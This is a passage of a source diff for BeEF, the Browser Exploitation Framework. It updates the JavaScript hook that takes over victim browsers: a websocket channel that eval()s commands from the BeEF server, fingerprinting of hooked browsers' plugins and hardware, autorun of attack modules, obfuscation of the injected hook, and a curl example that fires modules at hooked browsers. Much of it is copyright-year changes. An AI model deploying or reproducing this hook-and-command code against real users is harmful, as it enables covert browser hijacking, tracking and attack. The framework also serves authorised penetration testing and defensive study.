-            beef.net.request(beef.net.httpproto, 'GET', beef.net.host, beef.net.port, beef.net.hook, null, 'BEEFHOOK='+beef.session.get_hook_session_id(), 1, 'script', function(response) {
+            beef.net.request(beef.net.httpproto, 'GET', beef.net.host, beef.net.port, beef.net.hook, null, 'BEEFHOOK='+beef.session.get_hook_session_id(), 5, 'script', function(response) {
                 if (response.body != null && response.body.length > 0)
                     beef.updater.execute_commands();
             });
@@ -68,13 +68,12 @@ beef.updater = {
 		this.lock = false;
 	},
 	
-	// Executes the received commands if any.
+    /**
+     * Executes the received commands, if any.
+     */
 	execute_commands: function() {
 		if(beef.commands.length == 0) return;
-		
 		this.lock = true;
-		/*here execute the command */
-
 		while(beef.commands.length > 0) {
 			command = beef.commands.pop();
 			try {
@@ -83,7 +82,6 @@ beef.updater = {
 				console.error('execute_commands - command failed to execute: ' + e.message);
 			}
 		}
-		
 		this.lock = false;
 	}
 };

core/main/client/websocket.js

@@ -1,76 +1,90 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
 
 
-//beef.websocket.socket.send(take answer to server beef)
+/**
-/*New browser init call this */
+ * @Literal object: beef.websocket
+ *
+ * Manage the WebSocket communication channel.
+ * This channel is much faster and responsive, and it's used automatically
+ * if the browser supports WebSockets AND beef.http.websocket.enable = true.
+ */
 
 beef.websocket = {
 
     socket:null,
-    alive_timer:<%= @websocket_timer %>,
+    ws_poll_timeout: "<%= @ws_poll_timeout %>",
 
+    /**
+     * Initialize the WebSocket client object.
+     * Note: use WebSocketSecure only if the hooked domain is under https.
+     * Mixed-content in WS is quite different from a non-WS context.
+     */
     init:function () {
         var webSocketServer = beef.net.host;
-        var webSocketPort = <%= @websocket_port %>;
+        var webSocketPort = "<%= @websocket_port %>";
-        var webSocketSecure = <%= @websocket_secure %>;
+        var webSocketSecure = "<%= @websocket_secure %>";
         var protocol = "ws://";
-        //console.log("We are inside init");
+
-        /*use wss only if hooked domain is under https. Mixed-content in WS is quite different from a non-WS context*/
         if(webSocketSecure && window.location.protocol=="https:"){
             protocol = "wss://";
-        webSocketPort= <%= @websocket_sec_port %>;
+            webSocketPort= "<%= @websocket_sec_port %>";
         }
 
-    if (beef.browser.isFF() && !!window.MozWebSocket) {
+        if (beef.browser.isFF() && !!window.MozWebSocket) {
-        beef.websocket.socket = new MozWebSocket(protocol + webSocketServer + ":" + webSocketPort + "/");
+            beef.websocket.socket = new MozWebSocket(protocol + webSocketServer + ":" + webSocketPort + "/");
-
+        }else{
-        } else {
+            beef.websocket.socket = new WebSocket(protocol + webSocketServer + ":" + webSocketPort + "/");
-        beef.websocket.socket = new WebSocket(protocol + webSocketServer + ":" + webSocketPort + "/");
         }
 
     },
-    /* send Helo message to the BeEF server and start async communication*/
+
+    /**
+     * Send Helo message to the BeEF server and start async polling.
+     */
     start:function () {
         new beef.websocket.init();
         this.socket.onopen = function () {
-        //console.log("Socket has been opened!");
+            beef.websocket.send('{"cookie":"' + beef.session.get_hook_session_id() + '"}');
-
-        /*send browser id*/
-        beef.websocket.send('{"cookie":"' + beef.session.get_hook_session_id() + '"}');
-            //console.log("Connected and Helo");
             beef.websocket.alive();
-        }
+        };
+
         this.socket.onmessage = function (message) {
-            //console.log("Received message via WS."+ message.data);
+            //todo: double-check if there is a way to don't use eval here. It's not a big deal,
+            //todo: because the eval'ed data comes from BeEF itself, so is implicitly trusted.
             eval(message.data);
-        }
+        };
 
         this.socket.onclose = function () {
-        setTimeout(function(){beef.websocket.start()}, 5000);
+            setTimeout(function(){beef.websocket.start()}, 5000);
-        }
+        };
-
     },
 
+    /**
+     * Send data back to BeEF. This is basically the same as beef.net.send,
+     * but doesn't queue commands.
+     * Example usage:
+     * beef.websocket.send('{"handler" : "' + handler + '", "cid" :"' + cid +
+     * '", "result":"' + beef.encode.base64.encode(beef.encode.json.stringify(results)) +
+     * '","callback": "' + callback + '","bh":"' + beef.session.get_hook_session_id() + '" }');
+     */
     send:function (data) {
         try {
-        this.socket.send(data);
+            this.socket.send(data);
-        //console.log("Sent [" + data + "]");
+        }catch(err){}
-         }
-         catch(err){
-         //console.log(err);
-
-         }
     },
 
+    /**
+     * Polling mechanism, to notify the BeEF server that the browser is still hooked,
+     * and the WebSocket channel still alive.
+     * todo: there is probably a more efficient way to do this. Double-check WebSocket API.
+     */
     alive: function (){
         beef.websocket.send('{"alive":"'+beef.session.get_hook_session_id()+'"}');
-//        console.log("sent alive");
+        setTimeout("beef.websocket.alive()", beef.websocket.ws_poll_timeout);
-        setTimeout("beef.websocket.alive()", beef.websocket.alive_timer);
-
     }
 };
 

core/main/command.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/configuration.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/console/banners.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/console/commandline.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/constants/browsers.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/constants/commandmodule.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/constants/distributedengine.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/constants/hardware.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -12,6 +12,8 @@ module Constants
   module Hardware
 
     HW_UNKNOWN_IMG        = 'pc.png'
+	HW_VM_IMG             = 'vm.png'
+	HW_LAPTOP_IMG         = 'laptop.png'
 	HW_IPHONE_UA_STR      = 'iPhone'
  	HW_IPHONE_IMG         = 'iphone.jpg'
 	HW_IPAD_UA_STR	      = 'iPad'

core/main/constants/os.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/crypto.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/distributed_engine/models/rules.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/handlers/browserdetails.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -24,6 +24,9 @@ module BeEF
         end
 
         def setup()
+          print_debug "[INIT] Processing Browser Details..."
+          config = BeEF::Core::Configuration.instance
+
           # validate hook session value
           session_id = get_param(@data, 'beefhook')
           (self.err_msg "session id is invalid"; return) if not BeEF::Filters.is_valid_hook_session_id?(session_id)
@@ -165,11 +168,11 @@ module BeEF
           end
 
           # get and store the system platform
-          system_platform = get_param(@data['results'], 'SystemPlatform')
+          system_platform = get_param(@data['results'], 'BrowserPlatform')
           if BeEF::Filters.is_valid_system_platform?(system_platform)
-            BD.set(session_id, 'SystemPlatform', system_platform)
+            BD.set(session_id, 'BrowserPlatform', system_platform)
           else
-            self.err_msg "Invalid system platform returned from the hook browser's initial connection."
+            self.err_msg "Invalid browser platform returned from the hook browser's initial connection."
           end
 
           # get and store the hooked browser type
@@ -252,6 +255,54 @@ module BeEF
             self.err_msg "Invalid value for HasActiveX returned from the hook browser's initial connection."
           end
 
+          # get and store the yes|no value for HasSilverlight
+          has_silverlight = get_param(@data['results'], 'HasSilverlight')
+          if BeEF::Filters.is_valid_yes_no?(has_silverlight)
+            BD.set(session_id, 'HasSilverlight', has_silverlight)
+          else
+            self.err_msg "Invalid value for HasSilverlight returned from the hook browser's initial connection."
+          end
+
+          # get and store the yes|no value for HasQuickTime
+          has_quicktime = get_param(@data['results'], 'HasQuickTime')
+          if BeEF::Filters.is_valid_yes_no?(has_quicktime)
+            BD.set(session_id, 'HasQuickTime', has_quicktime)
+          else
+            self.err_msg "Invalid value for HasQuickTime returned from the hook browser's initial connection."
+          end
+
+          # get and store the yes|no value for HasRealPlayer
+          has_realplayer = get_param(@data['results'], 'HasRealPlayer')
+          if BeEF::Filters.is_valid_yes_no?(has_realplayer)
+            BD.set(session_id, 'HasRealPlayer', has_realplayer)
+          else
+            self.err_msg "Invalid value for HasRealPlayer returned from the hook browser's initial connection."
+          end
+
+          # get and store the yes|no value for HasVLC
+          has_vlc = get_param(@data['results'], 'HasVLC')
+          if BeEF::Filters.is_valid_yes_no?(has_vlc)
+            BD.set(session_id, 'HasVLC', has_vlc)
+          else
+            self.err_msg "Invalid value for HasVLC returned from the hook browser's initial connection."
+          end
+
+          # get and store the value for CPU
+          cpu_type = get_param(@data['results'], 'CPU')
+          if !cpu_type.nil?
+            BD.set(session_id, 'CPU', cpu_type)
+          else
+            self.err_msg "Invalid value for CPU returned from the hook browser's initial connection."
+          end
+
+          # get and store the value for TouchEnabled
+          touch_enabled = get_param(@data['results'], 'TouchEnabled')
+          if BeEF::Filters.is_valid_yes_no?(touch_enabled)
+            BD.set(session_id, 'TouchEnabled', touch_enabled)
+          else
+            self.err_msg "Invalid value for TouchEnabled returned from the hook browser's initial connection."
+          end
+
           # get and store whether the browser has session cookies enabled
           has_session_cookies = get_param(@data['results'], 'hasSessionCookies')
           if BeEF::Filters.is_valid_yes_no?(has_session_cookies)
@@ -273,19 +324,25 @@ module BeEF
 
 
           # Call autorun modules
-          autorun = []
+          if config.get('beef.autorun.enable')
-          BeEF::Core::Configuration.instance.get('beef.module').each { |k, v|
+            autorun = []
-            if v.has_key?('autorun') and v['autorun'] == true
+            BeEF::Core::Configuration.instance.get('beef.module').each { |k, v|
-              if BeEF::Module.support(k, {'browser' => browser_name, 'ver' => browser_version, 'os' => os_name}) == BeEF::Core::Constants::CommandModule::VERIFIED_WORKING
+              if v.has_key?('autorun') and v['autorun'] == true
-                BeEF::Module.execute(k, session_id)
+                target_status = BeEF::Module.support(k, {'browser' => browser_name, 'ver' => browser_version, 'os' => os_name})
-                autorun.push(k)
+                if target_status == BeEF::Core::Constants::CommandModule::VERIFIED_WORKING
-              else
+                  BeEF::Module.execute(k, session_id)
-                print_debug "Autorun attempted to execute unsupported module '#{k}' against Hooked browser #{zombie.ip}"
+                  autorun.push(k)
+                elsif target_status == BeEF::Core::Constants::CommandModule::VERIFIED_USER_NOTIFY and config.get('beef.autorun.allow_user_notify')
+                  BeEF::Module.execute(k, session_id)
+                  autorun.push(k)
+                else
+                  print_debug "Autorun attempted to execute unsupported module '#{k}' against Hooked browser [id:#{zombie.id}, ip:#{zombie.ip}, type:#{browser_name}-#{browser_version}, os:#{os_name}]"
+                end
               end
+            }
+            if autorun.length > 0
+              print_info "Autorun executed[#{autorun.join(', ')}] against Hooked browser [id:#{zombie.id}, ip:#{zombie.ip}, type:#{browser_name}-#{browser_version}, os:#{os_name}]"
             end
-          }
-          if autorun.length > 0
-            print_info "Autorun executed: #{autorun.join(', ')} against Hooked browser #{zombie.ip}"
           end
         end
 

core/main/handlers/commands.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/handlers/hookedbrowsers.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/handlers/modules/beefjs.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -21,16 +21,18 @@ module BeEF
             beef_js_path = "#{$root_dir}/core/main/client/"
 
             # @note External libraries (like jQuery) that are not evaluated with Eruby and possibly not obfuscated
-            ext_js_sub_files = %w(lib/jquery-1.5.2.min.js lib/evercookie.js lib/json2.js lib/jools.min.js)
+            ext_js_sub_files = %w(lib/jquery-1.5.2.min.js lib/evercookie.js lib/json2.js lib/jools.min.js lib/mdetect.js)
 
+            # @note BeEF libraries: need Eruby evaluation and obfuscation
+            beef_js_sub_files = %w(beef.js browser.js browser/cookie.js browser/popup.js session.js os.js hardware.js dom.js logger.js net.js updater.js encode/base64.js encode/json.js net/local.js init.js mitb.js net/dns.js net/cors.js are.js)
             # @note Load websocket library only if WS server is enabled in config.yaml
-            if config.get("beef.http.websocket.enable") == false
+            if config.get("beef.http.websocket.enable") == true
-              # @note BeEF libraries: need Eruby evaluation and obfuscation                                                                                                                           #antisnatchor: leave timeout.js as the last one!
+              beef_js_sub_files << "websocket.js"
-              beef_js_sub_files = %w(beef.js browser.js browser/cookie.js browser/popup.js session.js os.js hardware.js dom.js logger.js net.js updater.js encode/base64.js encode/json.js net/local.js init.js mitb.js net/dns.js are.js timeout.js)
-            else                                                                                                                                                                                                   #antisnatchor: leave timeout.js as the last one!
-              beef_js_sub_files = %w(beef.js browser.js browser/cookie.js browser/popup.js session.js os.js hardware.js dom.js logger.js net.js updater.js encode/base64.js encode/json.js net/local.js init.js mitb.js net/dns.js websocket.js are.js timeout.js)
             end
 
+            # @note antisnatchor: leave timeout.js as the last one!
+            beef_js_sub_files << "timeout.js"
+
             ext_js_to_obfuscate = ''
             ext_js_to_not_obfuscate = ''
 
@@ -69,6 +71,12 @@ module BeEF
               hook_session_config['beef_url'].sub!(/0\.0\.0\.0/, req_host)
             end
 
+            # @note set the XHR-polling timeout
+            hook_session_config['xhr_poll_timeout'] = config.get("beef.http.xhr_poll_timeout")
+
+            # @note set the hook file path
+            hook_session_config['hook_file'] = config.get("beef.http.hook_file")
+
             # @note if http_port <> public_port in config ini, use the public_port
             unless hook_session_config['beef_public_port'].nil?
               if hook_session_config['beef_port'] != hook_session_config['beef_public_port']
@@ -84,7 +92,7 @@ module BeEF
             if config.get("beef.http.websocket.enable")
               hook_session_config['websocket_secure'] = config.get("beef.http.websocket.secure")
               hook_session_config['websocket_port'] = config.get("beef.http.websocket.port")
-              hook_session_config['websocket_timer'] = config.get("beef.http.websocket.alive_timer")
+              hook_session_config['ws_poll_timeout'] = config.get("beef.http.websocket.ws_poll_timeout")
               hook_session_config['websocket_sec_port']= config.get("beef.http.websocket.secure_port")
             end
 
@@ -94,7 +102,7 @@ module BeEF
 
             if config.get("beef.extension.evasion.enable")
               evasion = BeEF::Extension::Evasion::Evasion.instance
-              @final_hook = ext_js_to_not_obfuscate + evasion.add_bootstrapper + evasion.obfuscate(ext_js_to_obfuscate + @hook) 
+              @final_hook = ext_js_to_not_obfuscate + evasion.add_bootstrapper + evasion.obfuscate(ext_js_to_obfuscate + @hook)
             else
               @final_hook = ext_js_to_not_obfuscate + @hook
             end

core/main/handlers/modules/command.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -52,7 +52,7 @@ module BeEF
             if config.get("beef.http.websocket.enable") && ws.getsocket(hooked_browser.session)
               #content = command_module.output.gsub('//
               #//
-              #//   Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+              #//   Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
               #//   Browser Exploitation Framework (BeEF) - http://beefproject.com
               #//   See the file 'doc/COPYING' for copying permission
               #//

core/main/logger.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/migration.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/models/browserdetails.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -103,7 +103,9 @@ module Models
     def self.hw_icon(session_id)
 
       ua_string = get(session_id, 'BrowserReportedName')
-
+      hardware  = get(session_id, 'Hardware')
+      return BeEF::Core::Constants::Hardware::HW_VM_IMG if hardware =~ /Virtual Machine/
+      return BeEF::Core::Constants::Hardware::HW_LAPTOP_IMG if hardware =~ /Laptop/
       return BeEF::Core::Constants::Hardware::HW_UNKNOWN_IMG if ua_string.nil?
 
       return BeEF::Core::Constants::Hardware::HW_WINPHONE_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_WINPHONE_UA_STR

core/main/models/command.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/models/commandmodule.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/models/hookedbrowser.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/models/log.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/models/optioncache.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/models/result.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/models/user.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/network_stack/api.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/network_stack/assethandler.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -24,6 +24,38 @@ module Handlers
       @root_dir = File.expand_path('../../../../', __FILE__)
     end
 
+    # Binds a redirector to a mount point
+    # @param [String] target The target for the redirector
+    # @param [String] path An optional URL path to mount the redirector to (can be nil for a random path)
+    # @return [String] URL Path of the redirector
+    # @todo This function, similar to bind(), should accept a hooked browser session to limit the mounted file to a certain session etc.
+    def bind_redirect(target, path=nil)
+      url = build_url(path,nil)
+      @allocations[url] = {'target' => target}
+      @http_server.mount(url,BeEF::Core::NetworkStack::Handlers::Redirector.new(target))
+      @http_server.remap
+      print_info "Redirector to [" + target + "] bound to url [" + url + "]"
+      url
+    end
+
+    # Binds raw HTTP to a mount point
+    # @param [Integer] status HTTP status code to return
+    # @param [String] headers HTTP headers as a JSON string to return
+    # @param [String] body HTTP body to return
+    # @param [String] path URL path to mount the asset to TODO (can be nil for random path)
+    # @todo @param [Integer] count The amount of times the asset can be accessed before being automatically unbinded (-1 = unlimited)
+    def bind_raw(status, header, body, path=nil, count=-1)
+      url = build_url(path,nil)
+      @allocations[url] = {}
+      @http_server.mount(
+        url,
+        BeEF::Core::NetworkStack::Handlers::Raw.new(status, header, body)
+      )
+      @http_server.remap
+      print_info "Raw HTTP bound to url [" + url + "]"
+      url
+    end
+
     # Binds a file to a mount point
     # @param [String] file File path to asset
     # @param [String] path URL path to mount the asset to (can be nil for random path)

core/main/network_stack/handlers/dynamicreconstruction.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/network_stack/handlers/raw.rb

@@ -0,0 +1,33 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+module BeEF
+  module Core
+    module NetworkStack
+      module Handlers
+
+        class Raw
+
+	        def initialize(status, header={}, body)
+	        	@status  = status
+	                @header  = header
+	                @body    = body
+	        end
+
+	        def call(env)
+	            [@status, @header, @body]
+	        end
+
+	        private
+
+	        @request
+
+	        @response
+
+	    end
+	end
+end
+end
+end

core/main/network_stack/handlers/redirector.rb

@@ -0,0 +1,42 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+module BeEF
+  module Core
+    module NetworkStack
+      module Handlers
+
+        # @note Redirector is used as a Rack app for mounting HTTP redirectors, instead of content
+        # @todo Add new options to specify what kind of redirect you want to achieve
+        class Redirector
+
+	        @target = "" 	
+
+	        def initialize(target)
+	        	@target = target
+	        end
+
+	        def call(env)
+	        	@response = Rack::Response.new(
+	        		body = ['302 found'],
+	        		status = 302,
+	        		header = {
+	        			'Content-Type' => 'text',
+	        			'Location' => @target
+	        		}
+	        	)
+	        end
+
+	        private
+
+	        @request
+
+	        @response
+
+	    end
+	end
+end
+end
+end

core/main/network_stack/websocket/websocket.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/rest/api.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/rest/handlers/admin.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/rest/handlers/categories.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/rest/handlers/hookedbrowsers.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -72,15 +72,15 @@ module BeEF
            details = BeEF::Core::Models::BrowserDetails
 
            {
-               'id' => hb.id,
+               'id'       => hb.id,
-               'session' => hb.session,
+               'session'  => hb.session,
-               'name' => details.get(hb.session, 'BrowserName'),
+               'name'     => details.get(hb.session, 'BrowserName'),
-               'version' => details.get(hb.session, 'BrowserVersion'),
+               'version'  => details.get(hb.session, 'BrowserVersion'),
-               'os' => details.get(hb.session, 'OsName'),
+               'os'       => details.get(hb.session, 'OsName'),
-               'platform' => details.get(hb.session, 'SystemPlatform'),
+               'platform' => details.get(hb.session, 'BrowserPlatform'),
-               'ip' => hb.ip,
+               'ip'       => hb.ip,
-               'domain' => details.get(hb.session, 'HostName'),
+               'domain'   => details.get(hb.session, 'HostName'),
-               'port' => hb.port.to_s,
+               'port'     => hb.port.to_s,
                'page_uri' => details.get(hb.session, 'PageURI')
            }
         end
@@ -88,4 +88,4 @@ module BeEF
       end
     end
   end
-end
+end

core/main/rest/handlers/logs.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/rest/handlers/modules.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -157,7 +157,8 @@ module BeEF
 
         #
         #@note Fire a new command module to multiple hooked browsers.
-        # Returns the command IDs of the launched modules, or 0 if firing got issues.
+        # Returns the command IDs of the launched module, or 0 if firing got issues.
+        #
         # POST request body example (for modules that don't need parameters, just remove "mod_params")
         #  {
         #    "mod_id":1,
@@ -166,12 +167,15 @@ module BeEF
         #     },
         #    "hb_ids":[1,2]
         #   }
+        #
         # response example: {"1":16,"2":17}
+        #
         # curl example (alert module with custom text, 2 hooked browsers)):
+        #
         #curl -H "Content-Type: application/json; charset=UTF-8" -d '{"mod_id":110,"mod_params":{"text":"mucci?"},"hb_ids":[1,2]}'
         #-X POST http://127.0.0.1:3000/api/modules/multi?token=2316d82702b83a293e2d46a0886a003a6be0a633
         #
-        post '/multi' do
+        post '/multi_browser' do
           request.body.rewind
           begin
             body = JSON.parse request.body.read
@@ -204,6 +208,68 @@ module BeEF
             error 400 # Bad Request
           end
         end
+
+        # @note Fire multiple command modules to a single hooked browser.
